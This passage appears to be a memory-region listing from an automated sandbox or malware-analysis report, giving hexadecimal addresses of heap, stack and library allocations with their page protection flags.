page read and write
|
||
194721C2000
|
heap
|
page read and write
|
||
50FE000
|
stack
|
page read and write
|
||
21F29D10000
|
heap
|
page read and write
|
||
ECE000
|
stack
|
page read and write
|
||
21F12CFD000
|
trusted library allocation
|
page read and write
|
||
21F12DDB000
|
trusted library allocation
|
page read and write
|
||
1B2B14A5000
|
trusted library allocation
|
page read and write
|
||
1E39F280000
|
heap
|
page read and write
|
||
1E449EA8000
|
trusted library allocation
|
page read and write
|
||
21F12D57000
|
trusted library allocation
|
page read and write
|
||
21F2A5F8000
|
heap
|
page read and write
|
||
A3F0CFD000
|
stack
|
page read and write
|
||
20D735FC000
|
heap
|
page read and write
|
||
A3F0FFE000
|
stack
|
page read and write
|
||
2300000
|
trusted library allocation
|
page read and write
|
||
21F12DBB000
|
trusted library allocation
|
page read and write
|
||
1E449F43000
|
trusted library allocation
|
page read and write
|
||
21F2BBE7000
|
heap
|
page read and write
|
||
21F2B200000
|
heap
|
page read and write
|
||
19457DBE000
|
heap
|
page read and write
|
||
1B2AFB10000
|
heap
|
page execute and read and write
|
||
1E45B3F2000
|
trusted library allocation
|
page read and write
|
||
21F2A8D5000
|
heap
|
page read and write
|
||
21F29B4C000
|
heap
|
page read and write
|
||
1E449F38000
|
trusted library allocation
|
page read and write
|
||
289897B8000
|
heap
|
page read and write
|
||
6FDA19D000
|
stack
|
page read and write
|
||
20D7361F000
|
heap
|
page read and write
|
||
21F2AF1B000
|
heap
|
page read and write
|
||
7FF848DFD000
|
trusted library allocation
|
page execute and read and write
|
||
1E45B46E000
|
trusted library allocation
|
page read and write
|
||
21F2A553000
|
heap
|
page read and write
|
||
21F2A63A000
|
heap
|
page read and write
|
||
21F12C99000
|
trusted library allocation
|
page read and write
|
||
21F12CC1000
|
trusted library allocation
|
page read and write
|
||
21F12F09000
|
trusted library allocation
|
page read and write
|
||
21F12DB7000
|
trusted library allocation
|
page read and write
|
||
21F12DCB000
|
trusted library allocation
|
page read and write
|
||
2898B351000
|
trusted library allocation
|
page read and write
|
||
23F67D30000
|
heap
|
page read and write
|
||
1E39F410000
|
heap
|
page read and write
|
||
1E45A48B000
|
trusted library allocation
|
page read and write
|
||
7FF848EB0000
|
trusted library allocation
|
page execute and read and write
|
||
21F12E53000
|
trusted library allocation
|
page read and write
|
||
1ADB50F3000
|
trusted library allocation
|
page read and write
|
||
217C541000
|
stack
|
page read and write
|
||
1E45B5B1000
|
trusted library allocation
|
page read and write
|
||
1D135857000
|
heap
|
page read and write
|
||
240000
|
unkown
|
page readonly
|
||
1ADB5409000
|
trusted library allocation
|
page read and write
|
||
21F29B10000
|
heap
|
page read and write
|
||
1E462700000
|
heap
|
page read and write
|
||
A3F0DFD000
|
stack
|
page read and write
|
||
1E449D30000
|
heap
|
page read and write
|
||
1E45AC31000
|
trusted library allocation
|
page read and write
|
||
21F12CB9000
|
trusted library allocation
|
page read and write
|
||
7FF848E0D000
|
trusted library allocation
|
page execute and read and write
|
||
1ADB52D5000
|
trusted library allocation
|
page read and write
|
||
1ADB541D000
|
trusted library allocation
|
page read and write
|
||
21F12DDD000
|
trusted library allocation
|
page read and write
|
||
21F12CE1000
|
trusted library allocation
|
page read and write
|
||
1E461D40000
|
trusted library allocation
|
page read and write
|
||
21F2AA1C000
|
heap
|
page read and write
|
||
1E44A314000
|
trusted library allocation
|
page read and write
|
||
1E45B418000
|
trusted library allocation
|
page read and write
|
||
21F0F664000
|
heap
|
page read and write
|
||
21F12DD9000
|
trusted library allocation
|
page read and write
|
||
1ADB3518000
|
heap
|
page read and write
|
||
21F12EA3000
|
trusted library allocation
|
page read and write
|
||
7FF848EE6000
|
trusted library allocation
|
page execute and read and write
|
||
2310E210000
|
heap
|
page read and write
|
||
11BC000
|
stack
|
page read and write
|
||
21F12CBD000
|
trusted library allocation
|
page read and write
|
||
7FF848FB0000
|
trusted library allocation
|
page read and write
|
||
1B2B1467000
|
trusted library allocation
|
page read and write
|
||
21F12E8D000
|
trusted library allocation
|
page read and write
|
||
289A3C20000
|
heap
|
page read and write
|
||
21F12E0D000
|
trusted library allocation
|
page read and write
|
||
7FF848E03000
|
trusted library allocation
|
page read and write
|
||
9AF41FF000
|
stack
|
page read and write
|
||
21F12D8B000
|
trusted library allocation
|
page read and write
|
||
1E459DC5000
|
trusted library allocation
|
page read and write
|
||
21F12E45000
|
trusted library allocation
|
page read and write
|
||
23F67D57000
|
heap
|
page read and write
|
||
1E462796000
|
heap
|
page read and write
|
||
21F12C9B000
|
trusted library allocation
|
page read and write
|
||
7FF848ED6000
|
trusted library allocation
|
page execute and read and write
|
||
21F12CDF000
|
trusted library allocation
|
page read and write
|
||
21F22096000
|
trusted library allocation
|
page read and write
|
||
A3EFBFF000
|
stack
|
page read and write
|
||
AD56FFF000
|
stack
|
page read and write
|
||
21F12CC5000
|
trusted library allocation
|
page read and write
|
||
21F12C61000
|
trusted library allocation
|
page read and write
|
||
1ADB3470000
|
heap
|
page read and write
|
||
21F12E95000
|
trusted library allocation
|
page read and write
|
||
20D7367A000
|
heap
|
page read and write
|
||
21F12DAB000
|
trusted library allocation
|
page read and write
|
||
28989798000
|
heap
|
page read and write
|
||
31542FE000
|
stack
|
page read and write
|
||
2898B5FB000
|
trusted library allocation
|
page read and write
|
||
1E44A0BD000
|
trusted library allocation
|
page read and write
|
||
19232EB0000
|
heap
|
page read and write
|
||
21F12CDB000
|
trusted library allocation
|
page read and write
|
||
21F12D69000
|
trusted library allocation
|
page read and write
|
||
1E449B53000
|
trusted library allocation
|
page read and write
|
||
1E45AD87000
|
trusted library allocation
|
page read and write
|
||
7FF848E14000
|
trusted library allocation
|
page read and write
|
||
230B000
|
trusted library allocation
|
page execute and read and write
|
||
21F12EE3000
|
trusted library allocation
|
page read and write
|
||
1E449F61000
|
trusted library allocation
|
page read and write
|
||
1ADB509F000
|
trusted library allocation
|
page read and write
|
||
21F12E85000
|
trusted library allocation
|
page read and write
|
||
206812EE000
|
heap
|
page read and write
|
||
7FF848DFD000
|
trusted library allocation
|
page execute and read and write
|
||
21F0F662000
|
heap
|
page read and write
|
||
28989750000
|
heap
|
page read and write
|
||
2898B59F000
|
trusted library allocation
|
page read and write
|
||
21F12F11000
|
trusted library allocation
|
page read and write
|
||
2898B59B000
|
trusted library allocation
|
page read and write
|
||
1E449F01000
|
trusted library allocation
|
page read and write
|
||
9AF42FE000
|
stack
|
page read and write
|
||
21F12DA1000
|
trusted library allocation
|
page read and write
|
||
28D85000000
|
heap
|
page read and write
|
||
2310E270000
|
heap
|
page read and write
|
||
21F12D43000
|
trusted library allocation
|
page read and write
|
||
21F2A294000
|
heap
|
page read and write
|
||
7FF848F9B000
|
trusted library allocation
|
page read and write
|
||
2898B6CF000
|
trusted library allocation
|
page read and write
|
||
1ADB53F3000
|
trusted library allocation
|
page read and write
|
||
1ADB50ED000
|
trusted library allocation
|
page read and write
|
||
1E45AF51000
|
trusted library allocation
|
page read and write
|
||
21F12C35000
|
trusted library allocation
|
page read and write
|
||
1E449DE7000
|
trusted library allocation
|
page read and write
|
||
AD571FD000
|
stack
|
page read and write
|
||
7FF848F00000
|
trusted library allocation
|
page execute and read and write
|
||
1E45B467000
|
trusted library allocation
|
page read and write
|
||
21F12C6F000
|
trusted library allocation
|
page read and write
|
||
1E45B42D000
|
trusted library allocation
|
page read and write
|
||
21F12E2F000
|
trusted library allocation
|
page read and write
|
||
53DE000
|
stack
|
page read and write
|
||
1E44A0AE000
|
trusted library allocation
|
page read and write
|
||
7FF848DF2000
|
trusted library allocation
|
page read and write
|
||
20D737E5000
|
heap
|
page read and write
|
||
1E448167000
|
heap
|
page read and write
|
||
21F12ED1000
|
trusted library allocation
|
page read and write
|
||
16A7000
|
trusted library allocation
|
page execute and read and write
|
||
2898B3C3000
|
trusted library allocation
|
page read and write
|
||
1E449F65000
|
trusted library allocation
|
page read and write
|
||
7FF848FB5000
|
trusted library allocation
|
page read and write
|
||
2898B3BF000
|
trusted library allocation
|
page read and write
|
||
21F2A324000
|
heap
|
page read and write
|
||
19234B40000
|
heap
|
page execute and read and write
|
||
2898B5F1000
|
trusted library allocation
|
page read and write
|
||
21F2B62E000
|
heap
|
page read and write
|
||
21F12E9F000
|
trusted library allocation
|
page read and write
|
||
2898B6D9000
|
trusted library allocation
|
page read and write
|
||
21F12D0F000
|
trusted library allocation
|
page read and write
|
||
21F12DE9000
|
trusted library allocation
|
page read and write
|
||
1E459DEA000
|
trusted library allocation
|
page read and write
|
||
1E459DF0000
|
trusted library allocation
|
page read and write
|
||
7FF848FC0000
|
trusted library allocation
|
page read and write
|
||
289897BB000
|
heap
|
page read and write
|
||
1E45BC11000
|
trusted library allocation
|
page read and write
|
||
361AFFD000
|
stack
|
page read and write
|
||
1E44A0C3000
|
trusted library allocation
|
page read and write
|
||
1E44A2AB000
|
trusted library allocation
|
page read and write
|
||
21F12E5B000
|
trusted library allocation
|
page read and write
|
||
1ADB50EB000
|
trusted library allocation
|
page read and write
|
||
7FF848EA6000
|
trusted library allocation
|
page read and write
|
||
21F12CD1000
|
trusted library allocation
|
page read and write
|
||
1E45B5DC000
|
trusted library allocation
|
page read and write
|
||
8BE000
|
stack
|
page read and write
|
||
2320000
|
trusted library allocation
|
page read and write
|
||
1E44A0B7000
|
trusted library allocation
|
page read and write
|
||
28D8503A000
|
heap
|
page read and write
|
||
1ADB53C6000
|
trusted library allocation
|
page read and write
|
||
21F12D6B000
|
trusted library allocation
|
page read and write
|
||
21F2A056000
|
heap
|
page read and write
|
||
2501000
|
trusted library allocation
|
page read and write
|
||
81F9DFF000
|
stack
|
page read and write
|
||
21F12EF3000
|
trusted library allocation
|
page read and write
|
||
1E45B647000
|
trusted library allocation
|
page read and write
|
||
1ADB50D5000
|
trusted library allocation
|
page read and write
|
||
21F12EFF000
|
trusted library allocation
|
page read and write
|
||
361AAF9000
|
stack
|
page read and write
|
||
1E449EFF000
|
trusted library allocation
|
page read and write
|
||
7FF848DE4000
|
trusted library allocation
|
page read and write
|
||
21F2A4F8000
|
heap
|
page read and write
|
||
7778AFA000
|
stack
|
page read and write
|
||
1E45A487000
|
trusted library allocation
|
page read and write
|
||
21F29FC0000
|
heap
|
page read and write
|
||
162E000
|
stack
|
page read and write
|
||
21F2A209000
|
heap
|
page read and write
|
||
7FF848E0D000
|
trusted library allocation
|
page execute and read and write
|
||
21F12C69000
|
trusted library allocation
|
page read and write
|
||
77788FE000
|
stack
|
page read and write
|
||
21F12C5F000
|
trusted library allocation
|
page read and write
|
||
1339000
|
stack
|
page read and write
|
||
1E45B567000
|
trusted library allocation
|
page read and write
|
||
1B2AFAA0000
|
heap
|
page execute and read and write
|
||
14F0000
|
heap
|
page read and write
|
||
1ADB34E0000
|
trusted library allocation
|
page read and write
|
||
32AC000
|
trusted library allocation
|
page read and write
|
||
1E459E07000
|
trusted library allocation
|
page read and write
|
||
1B2AF8F8000
|
heap
|
page read and write
|
||
21F12C45000
|
trusted library allocation
|
page read and write
|
||
1C8FA550000
|
heap
|
page read and write
|
||
21F21AC3000
|
trusted library allocation
|
page read and write
|
||
1E45A687000
|
trusted library allocation
|
page read and write
|
||
1830ECA0000
|
heap
|
page read and write
|
||
3230000
|
heap
|
page execute and read and write
|
||
21F12C73000
|
trusted library allocation
|
page read and write
|
||
7FF848E2D000
|
trusted library allocation
|
page execute and read and write
|
||
21F2198D000
|
trusted library allocation
|
page read and write
|
||
7FF848E4C000
|
trusted library allocation
|
page execute and read and write
|
||
9AF44FE000
|
stack
|
page read and write
|
||
21F2A9FC000
|
heap
|
page read and write
|
||
1E45AE7C000
|
trusted library allocation
|
page read and write
|
||
AD56B9D000
|
stack
|
page read and write
|
||
21F12E93000
|
trusted library allocation
|
page read and write
|
||
6FDA165000
|
stack
|
page read and write
|
||
1E44A340000
|
trusted library allocation
|
page read and write
|
||
23F67D89000
|
heap
|
page read and write
|
||
7FF848E24000
|
trusted library allocation
|
page read and write
|
||
21F12E05000
|
trusted library allocation
|
page read and write
|
||
1E45A4A5000
|
trusted library allocation
|
page read and write
|
||
1650000
|
heap
|
page read and write
|
||
7FF848E00000
|
trusted library allocation
|
page read and write
|
||
1D135C15000
|
heap
|
page read and write
|
||
21F12E87000
|
trusted library allocation
|
page read and write
|
||
1B2B17DB000
|
trusted library allocation
|
page read and write
|
||
21F12DCD000
|
trusted library allocation
|
page read and write
|
||
21F12C93000
|
trusted library allocation
|
page read and write
|
||
117E000
|
stack
|
page read and write
|
||
21F2A7CB000
|
heap
|
page read and write
|
||
2898B5A5000
|
trusted library allocation
|
page read and write
|
||
3153F1D000
|
stack
|
page read and write
|
||
1E44813D000
|
heap
|
page read and write
|
||
19232EA0000
|
heap
|
page read and write
|
||
1E449EF8000
|
trusted library allocation
|
page read and write
|
||
21F12DD7000
|
trusted library allocation
|
page read and write
|
||
7FF848F10000
|
trusted library allocation
|
page execute and read and write
|
||
21F21A83000
|
trusted library allocation
|
page read and write
|
||
1ADB536D000
|
trusted library allocation
|
page read and write
|
||
1E459E31000
|
trusted library allocation
|
page read and write
|
||
21F12D6F000
|
trusted library allocation
|
page read and write
|
||
21F12D9F000
|
trusted library allocation
|
page read and write
|
||
21F2B650000
|
heap
|
page read and write
|
||
1B2AFA30000
|
trusted library allocation
|
page read and write
|
||
2898B3C5000
|
trusted library allocation
|
page read and write
|
||
21F12EEF000
|
trusted library allocation
|
page read and write
|
||
21F2956F000
|
heap
|
page read and write
|
||
29974E30000
|
heap
|
page read and write
|
||
19457B50000
|
unkown
|
page readonly
|
||
1E45A41B000
|
trusted library allocation
|
page read and write
|
||
1B2AF92C000
|
heap
|
page read and write
|
||
18BE000
|
stack
|
page read and write
|
||
1B2AFB45000
|
heap
|
page read and write
|
||
1ADB50CD000
|
trusted library allocation
|
page read and write
|
||
21F220AE000
|
trusted library allocation
|
page read and write
|
||
1924D400000
|
heap
|
page read and write
|
||
1D1357A0000
|
heap
|
page read and write
|
||
1B2B173D000
|
trusted library allocation
|
page read and write
|
||
1640000
|
heap
|
page read and write
|
||
16FE000
|
stack
|
page read and write
|
||
21F2AFDA000
|
heap
|
page read and write
|
||
1E45B547000
|
trusted library allocation
|
page read and write
|
||
1B2B144F000
|
trusted library allocation
|
page read and write
|
||
21F2B804000
|
heap
|
page read and write
|
||
7FF848E10000
|
trusted library allocation
|
page read and write
|
||
1ADB5079000
|
trusted library allocation
|
page read and write
|
||
1E449F1D000
|
trusted library allocation
|
page read and write
|
||
A3EFEFD000
|
stack
|
page read and write
|
||
20681330000
|
heap
|
page read and write
|
||
2310E275000
|
heap
|
page read and write
|
||
1B2B149F000
|
trusted library allocation
|
page read and write
|
||
1E45B4B7000
|
trusted library allocation
|
page read and write
|
||
19234BA8000
|
trusted library allocation
|
page read and write
|
||
32B4000
|
trusted library allocation
|
page read and write
|
||
21F0F940000
|
heap
|
page read and write
|
||
1ADB52CD000
|
trusted library allocation
|
page read and write
|
||
1B2B16F1000
|
trusted library allocation
|
page read and write
|
||
1ADB509D000
|
trusted library allocation
|
page read and write
|
||
D80000
|
heap
|
page read and write
|
||
1E45B587000
|
trusted library allocation
|
page read and write
|
||
1E45AD7C000
|
trusted library allocation
|
page read and write
|
||
1830EC8B000
|
heap
|
page read and write
|
||
50CB31C000
|
stack
|
page read and write
|
||
29974C8D000
|
heap
|
page read and write
|
||
21F12CD5000
|
trusted library allocation
|
page read and write
|
||
1E45B691000
|
trusted library allocation
|
page read and write
|
||
1E44A320000
|
trusted library allocation
|
page read and write
|
||
1E45B485000
|
trusted library allocation
|
page read and write
|
||
7FF848E03000
|
trusted library allocation
|
page read and write
|
||
1B2B146B000
|
trusted library allocation
|
page read and write
|
||
23F67DAB000
|
heap
|
page read and write
|
||
2898B3AF000
|
trusted library allocation
|
page read and write
|
||
1E39F2C1000
|
heap
|
page read and write
|
||
21F2C095000
|
heap
|
page read and write
|
||
123C000
|
stack
|
page read and write
|
||
1E45A477000
|
trusted library allocation
|
page read and write
|
||
21F2BE4E000
|
heap
|
page read and write
|
||
7FF848F92000
|
trusted library allocation
|
page read and write
|
||
2898B36F000
|
trusted library allocation
|
page read and write
|
||
21F12D05000
|
trusted library allocation
|
page read and write
|
||
7FF848EB0000
|
trusted library allocation
|
page execute and read and write
|
||
21F12D8F000
|
trusted library allocation
|
page read and write
|
||
192330A0000
|
heap
|
page read and write
|
||
21F2B589000
|
heap
|
page read and write
|
||
1830EBD0000
|
heap
|
page read and write
|
||
1E45A5F1000
|
trusted library allocation
|
page read and write
|
||
7FF848E9C000
|
trusted library allocation
|
page execute and read and write
|
||
20681190000
|
heap
|
page read and write
|
||
21F12CC7000
|
trusted library allocation
|
page read and write
|
||
21F12CE9000
|
trusted library allocation
|
page read and write
|
||
21F2A1C7000
|
heap
|
page read and write
|
||
21F21A18000
|
trusted library allocation
|
page read and write
|
||
4D1E000
|
stack
|
page read and write
|
||
3110000
|
heap
|
page read and write
|
||
21F12C91000
|
trusted library allocation
|
page read and write
|
||
7FF848DF0000
|
trusted library allocation
|
page read and write
|
||
21F12EFD000
|
trusted library allocation
|
page read and write
|
||
9AF40FE000
|
stack
|
page read and write
|
||
A3EF78F000
|
stack
|
page read and write
|
||
21F12E8B000
|
trusted library allocation
|
page read and write
|
||
21F12E21000
|
trusted library allocation
|
page read and write
|
||
21F22074000
|
trusted library allocation
|
page read and write
|
||
7FF848EBC000
|
trusted library allocation
|
page execute and read and write
|
||
21F2A2E1000
|
heap
|
page read and write
|
||
21F2A2C2000
|
heap
|
page read and write
|
||
21F12EB5000
|
trusted library allocation
|
page read and write
|
||
21F2BA03000
|
heap
|
page read and write
|
||
A3F02F2000
|
stack
|
page read and write
|
||
1ADB3450000
|
heap
|
page read and write
|
||
2898B59D000
|
trusted library allocation
|
page read and write
|
||
21F2A0CF000
|
heap
|
page read and write
|
||
2898B6ED000
|
trusted library allocation
|
page read and write
|
||
361ABFD000
|
stack
|
page read and write
|
||
22B163E0000
|
heap
|
page read and write
|
||
1E44A08F000
|
trusted library allocation
|
page read and write
|
||
7FF848FB0000
|
trusted library allocation
|
page read and write
|
||
1E449F25000
|
trusted library allocation
|
page read and write
|
||
7FF848F20000
|
trusted library allocation
|
page execute and read and write
|
||
87A000
|
stack
|
page read and write
|
||
21F12C39000
|
trusted library allocation
|
page read and write
|
||
1E449F67000
|
trusted library allocation
|
page read and write
|
||
1E45A567000
|
trusted library allocation
|
page read and write
|
||
1ADB3350000
|
heap
|
page read and write
|
||
23F67DAB000
|
heap
|
page read and write
|
||
19457DE2000
|
heap
|
page read and write
|
||
21F219C3000
|
trusted library allocation
|
page read and write
|
||
21F12F0F000
|
trusted library allocation
|
page read and write
|
||
1B2B17C3000
|
trusted library allocation
|
page read and write
|
||
22B16365000
|
heap
|
page read and write
|
||
1E449F1F000
|
trusted library allocation
|
page read and write
|
||
21F12DAF000
|
trusted library allocation
|
page read and write
|
||
21F21A0D000
|
trusted library allocation
|
page read and write
|
||
590C000
|
stack
|
page read and write
|
||
21F12D87000
|
trusted library allocation
|
page read and write
|
||
AD573FE000
|
stack
|
page read and write
|
||
2310E2E0000
|
heap
|
page read and write
|
||
21F12E09000
|
trusted library allocation
|
page read and write
|
||
50BE000
|
stack
|
page read and write
|
||
6FDA191000
|
stack
|
page read and write
|
||
21F12D59000
|
trusted library allocation
|
page read and write
|
||
1E45AE71000
|
trusted library allocation
|
page read and write
|
||
1B2B17BD000
|
trusted library allocation
|
page read and write
|
||
21F12D75000
|
trusted library allocation
|
page read and write
|
||
1E448300000
|
heap
|
page read and write
|
||
1E449F41000
|
trusted library allocation
|
page read and write
|
||
19457DA6000
|
heap
|
page read and write
|
||
1830EC00000
|
heap
|
page read and write
|
||
7FF848FB5000
|
trusted library allocation
|
page read and write
|
||
1E459E0C000
|
trusted library allocation
|
page read and write
|
||
1ADB5071000
|
trusted library allocation
|
page read and write
|
||
21F12E73000
|
trusted library allocation
|
page read and write
|
||
20681302000
|
heap
|
page read and write
|
||
21F12EB1000
|
trusted library allocation
|
page read and write
|
||
1C8FA530000
|
heap
|
page read and write
|
||
1B2B1469000
|
trusted library allocation
|
page read and write
|
||
19457CE0000
|
heap
|
page read and write
|
||
23C0000
|
heap
|
page read and write
|
||
21F12E55000
|
trusted library allocation
|
page read and write
|
||
B3F000
|
unkown
|
page read and write
|
||
7FF848EC0000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848E0D000
|
trusted library allocation
|
page execute and read and write
|
||
17FF000
|
stack
|
page read and write
|
||
1B2C1441000
|
trusted library allocation
|
page read and write
|
||
21F12E41000
|
trusted library allocation
|
page read and write
|
||
21F29B3D000
|
heap
|
page read and write
|
||
21F21978000
|
trusted library allocation
|
page read and write
|
||
1415000
|
heap
|
page read and write
|
||
1D135850000
|
heap
|
page read and write
|
||
1924D380000
|
heap
|
page execute and read and write
|
||
50CB67E000
|
stack
|
page read and write
|
||
1E45ADD1000
|
trusted library allocation
|
page read and write
|
||
21F12DE1000
|
trusted library allocation
|
page read and write
|
||
21F12F0B000
|
trusted library allocation
|
page read and write
|
||
19232F17000
|
heap
|
page read and write
|
||
21F12C5D000
|
trusted library allocation
|
page read and write
|
||
1D291D90000
|
heap
|
page read and write
|
||
7FF848E1D000
|
trusted library allocation
|
page execute and read and write
|
||
1ADB509B000
|
trusted library allocation
|
page read and write
|
||
1B2B1731000
|
trusted library allocation
|
page read and write
|
||
21F12EC9000
|
trusted library allocation
|
page read and write
|
||
21F12EE5000
|
trusted library allocation
|
page read and write
|
||
1B2B1453000
|
trusted library allocation
|
page read and write
|
||
21F2BB3D000
|
heap
|
page read and write
|
||
19457D45000
|
heap
|
page read and write
|
||
7FF848E1B000
|
trusted library allocation
|
page execute and read and write
|
||
21F12EC3000
|
trusted library allocation
|
page read and write
|
||
21F0F880000
|
heap
|
page read and write
|
||
21F2A702000
|
heap
|
page read and write
|
||
324E000
|
trusted library allocation
|
page read and write
|
||
6B8000
|
heap
|
page read and write
|
||
1B2B168F000
|
trusted library allocation
|
page read and write
|
||
2898B5A9000
|
trusted library allocation
|
page read and write
|
||
19234ED3000
|
trusted library allocation
|
page read and write
|
||
1B2B14BF000
|
trusted library allocation
|
page read and write
|
||
1E449DCA000
|
trusted library allocation
|
page read and write
|
||
21F2A82F000
|
heap
|
page read and write
|
||
7FF848FA0000
|
trusted library allocation
|
page read and write
|
||
22E0000
|
trusted library allocation
|
page read and write
|
||
21F2B5CB000
|
heap
|
page read and write
|
||
7FF848E04000
|
trusted library allocation
|
page read and write
|
||
21F12CC9000
|
trusted library allocation
|
page read and write
|
||
1ADB52CB000
|
trusted library allocation
|
page read and write
|
||
1E459E01000
|
trusted library allocation
|
page read and write
|
||
289897AB000
|
heap
|
page read and write
|
||
21F2B6B8000
|
heap
|
page read and write
|
||
21F12D9D000
|
trusted library allocation
|
page read and write
|
||
21F2B338000
|
heap
|
page read and write
|
||
21F12E6B000
|
trusted library allocation
|
page read and write
|
||
361A3FE000
|
stack
|
page read and write
|
||
21F2A0FC000
|
heap
|
page read and write
|
||
21F2B61D000
|
heap
|
page read and write
|
||
21F12C71000
|
trusted library allocation
|
page read and write
|
||
21F12D8D000
|
trusted library allocation
|
page read and write
|
||
1E459F80000
|
trusted library allocation
|
page read and write
|
||
21F2B18E000
|
heap
|
page read and write
|
||
19232ECB000
|
heap
|
page read and write
|
||
21F12E7B000
|
trusted library allocation
|
page read and write
|
||
21F12E1F000
|
trusted library allocation
|
page read and write
|
||
65A000
|
heap
|
page read and write
|
||
19234EBE000
|
trusted library allocation
|
page read and write
|
||
1E44A27C000
|
trusted library allocation
|
page read and write
|
||
7FF848E00000
|
trusted library allocation
|
page read and write
|
||
1ADB541F000
|
trusted library allocation
|
page read and write
|
||
21F12E5F000
|
trusted library allocation
|
page read and write
|
||
1E459E1B000
|
trusted library allocation
|
page read and write
|
||
1E45A496000
|
trusted library allocation
|
page read and write
|
||
1C8FA587000
|
heap
|
page read and write
|
||
1E4482D0000
|
heap
|
page read and write
|
||
7FF848E1D000
|
trusted library allocation
|
page execute and read and write
|
||
1D135790000
|
heap
|
page read and write
|
||
1ADB52CF000
|
trusted library allocation
|
page read and write
|
||
21F12D31000
|
trusted library allocation
|
page read and write
|
||
21F12D17000
|
trusted library allocation
|
page read and write
|
||
2898B3BB000
|
trusted library allocation
|
page read and write
|
||
6FDA156000
|
stack
|
page read and write
|
||
4A30000
|
heap
|
page execute and read and write
|
||
21F12DC9000
|
trusted library allocation
|
page read and write
|
||
321F000
|
stack
|
page read and write
|
||
D54000
|
trusted library allocation
|
page read and write
|
||
21F12E25000
|
trusted library allocation
|
page read and write
|
||
525E000
|
stack
|
page read and write
|
||
21F22057000
|
trusted library allocation
|
page read and write
|
||
21F12CFB000
|
trusted library allocation
|
page read and write
|
||
21F12C41000
|
trusted library allocation
|
page read and write
|
||
7778CFE000
|
stack
|
page read and write
|
||
3619F7E000
|
stack
|
page read and write
|
||
16B0000
|
heap
|
page read and write
|
||
2898B6F9000
|
trusted library allocation
|
page read and write
|
||
1ADB3745000
|
heap
|
page read and write
|
||
21F12E79000
|
trusted library allocation
|
page read and write
|
||
1830EF95000
|
heap
|
page read and write
|
||
21F2B084000
|
heap
|
page read and write
|
||
3067000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848F80000
|
trusted library allocation
|
page read and write
|
||
21F12D1B000
|
trusted library allocation
|
page read and write
|
||
21F12C2F000
|
trusted library allocation
|
page read and write
|
||
1E449F69000
|
trusted library allocation
|
page read and write
|
||
685000
|
heap
|
page read and write
|
||
1E44A0CF000
|
trusted library allocation
|
page read and write
|
||
28989880000
|
heap
|
page read and write
|
||
21F12C43000
|
trusted library allocation
|
page read and write
|
||
29974C7B000
|
heap
|
page read and write
|
||
21F2B042000
|
heap
|
page read and write
|
||
7FF848E4C000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848ED0000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848E5C000
|
trusted library allocation
|
page execute and read and write
|
||
21F12DF3000
|
trusted library allocation
|
page read and write
|
||
21F12D33000
|
trusted library allocation
|
page read and write
|
||
1E39F4D5000
|
heap
|
page read and write
|
||
1E459EF8000
|
trusted library allocation
|
page read and write
|
||
21F12CC3000
|
trusted library allocation
|
page read and write
|
||
21F12E77000
|
trusted library allocation
|
page read and write
|
||
22B16330000
|
heap
|
page read and write
|
||
21F2A0F7000
|
heap
|
page read and write
|
||
1E44A291000
|
trusted library allocation
|
page read and write
|
||
1670000
|
trusted library allocation
|
page read and write
|
||
2898B6AE000
|
trusted library allocation
|
page read and write
|
||
1830EC9C000
|
heap
|
page read and write
|
||
1E4638A0000
|
heap
|
page read and write
|
||
1B2B16F3000
|
trusted library allocation
|
page read and write
|
||
1E449ECD000
|
trusted library allocation
|
page read and write
|
||
2898B6E9000
|
trusted library allocation
|
page read and write
|
||
7FF848FC0000
|
trusted library allocation
|
page read and write
|
||
21F29DF0000
|
heap
|
page read and write
|
||
6FDA6FE000
|
stack
|
page read and write
|
||
6FDA187000
|
stack
|
page read and write
|
||
1E459E90000
|
trusted library allocation
|
page read and write
|
||
B10000
|
trusted library allocation
|
page read and write
|
||
1E45A727000
|
trusted library allocation
|
page read and write
|
||
21F12EAF000
|
trusted library allocation
|
page read and write
|
||
1E39F239000
|
heap
|
page read and write
|
||
21F2AD00000
|
heap
|
page read and write
|
||
21F2BE92000
|
heap
|
page read and write
|
||
2898B39F000
|
trusted library allocation
|
page read and write
|
||
7FF848E13000
|
trusted library allocation
|
page read and write
|
||
21F12CA3000
|
trusted library allocation
|
page read and write
|
||
19457EF0000
|
heap
|
page read and write
|
||
7FF848E14000
|
trusted library allocation
|
page read and write
|
||
32B2000
|
trusted library allocation
|
page read and write
|
||
75B1DDC000
|
stack
|
page read and write
|
||
21F219AB000
|
trusted library allocation
|
page read and write
|
||
1ADB532B000
|
trusted library allocation
|
page read and write
|
||
A00000
|
heap
|
page read and write
|
||
21F21923000
|
trusted library allocation
|
page read and write
|
||
21F2B73C000
|
heap
|
page read and write
|
||
21F2B547000
|
heap
|
page read and write
|
||
21F12CF3000
|
trusted library allocation
|
page read and write
|
||
1E448320000
|
heap
|
page read and write
|
||
1533000
|
heap
|
page read and write
|
||
20D73660000
|
heap
|
page read and write
|
||
770000
|
heap
|
page read and write
|
||
21F21AB8000
|
trusted library allocation
|
page read and write
|
||
21F219CD000
|
trusted library allocation
|
page read and write
|
||
361A6FD000
|
stack
|
page read and write
|
||
1E45A4DE000
|
trusted library allocation
|
page read and write
|
||
7FF848EA0000
|
trusted library allocation
|
page execute and read and write
|
||
19232F75000
|
heap
|
page read and write
|
||
EE0000
|
heap
|
page read and write
|
||
21F12D4F000
|
trusted library allocation
|
page read and write
|
||
1E45A771000
|
trusted library allocation
|
page read and write
|
||
21F12D2D000
|
trusted library allocation
|
page read and write
|
||
183D000
|
stack
|
page read and write
|
||
A3F0BFE000
|
stack
|
page read and write
|
||
21F12DF9000
|
trusted library allocation
|
page read and write
|
||
21F12CAD000
|
trusted library allocation
|
page read and write
|
||
21F12D3B000
|
trusted library allocation
|
page read and write
|
||
1ADB5429000
|
trusted library allocation
|
page read and write
|
||
7FF848DF0000
|
trusted library allocation
|
page read and write
|
||
32A4000
|
trusted library allocation
|
page read and write
|
||
1ADB3535000
|
heap
|
page read and write
|
||
21F12D23000
|
trusted library allocation
|
page read and write
|
||
1ADB52C9000
|
trusted library allocation
|
page read and write
|
||
1E459F70000
|
trusted library allocation
|
page read and write
|
||
9FE000
|
stack
|
page read and write
|
||
21F12CAB000
|
trusted library allocation
|
page read and write
|
||
67D000
|
heap
|
page read and write
|
||
8C0000
|
heap
|
page read and write
|
||
D5D000
|
trusted library allocation
|
page execute and read and write
|
||
1B2B17AE000
|
trusted library allocation
|
